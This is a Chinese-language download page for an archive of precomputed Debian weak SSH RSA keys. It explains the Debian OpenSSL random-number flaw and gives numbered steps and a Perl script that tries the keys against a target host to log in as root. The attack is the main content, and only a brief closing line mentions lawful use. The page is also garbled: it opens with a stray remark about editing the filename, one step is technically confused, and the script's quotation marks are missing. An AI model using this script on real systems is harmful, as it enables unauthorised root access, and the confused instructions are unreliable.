
debian_ssh_rsa_2048_x86.tar.bz2(无需修改) 该文件名是一个具体的文件标识符,并没有实际的标题描述部分,因此无法按照要求进行优化。如果需要对该压缩包的内容或用途做简短说明,则可以添加额外的文字信息。例如:“适用于x86架构的Debian SSH RSA 2048密钥包”。但请注意这超出了原名的8%改动范围。
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
该文件名为debian_ssh_rsa_2048_x86.tar.bz2,是一个包含适用于x86架构Debian系统的SSH RSA 2048位密钥的压缩包。
Debian OpenSSL中的PRNG漏洞使得生成的SSH密钥仅有65,536种可能性,并且这些可能受到进程ID的影响。因此,可以使用预计算好的SSH密钥进行暴力破解攻击。
在未修补的系统中执行以下步骤:
1. 下载包含2048位RSA SSH私钥的压缩包。
2. 解压文件到指定目录。
3. 将解压得到的私钥添加至目标主机(如Upatched Debian)中的`/root/.ssh/authorized_keys`,以利用该漏洞生成较弱的密钥对。
4. 运行提供的Perl脚本程序,并将其指向包含SSH私钥文件的位置及待攻击的目标IP地址。
以下是用于执行上述步骤的Perl代码:
```perl
#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n;
print Example: ./exploiter.pl /root/keys/ 127.0.0.1\n;
exit(0);
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die(opendir);
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system(echo .join( , @a).; ssh -l root .join( , map { -i .$_ } @a). .$ARGV[1]);
@a = ();
}
}
# 在几分钟(通常少于20分钟)内,将获得成功。
```
请确保在进行此类操作时遵守相关法律法规,并仅用于学习或测试环境。
全部评论 (0)


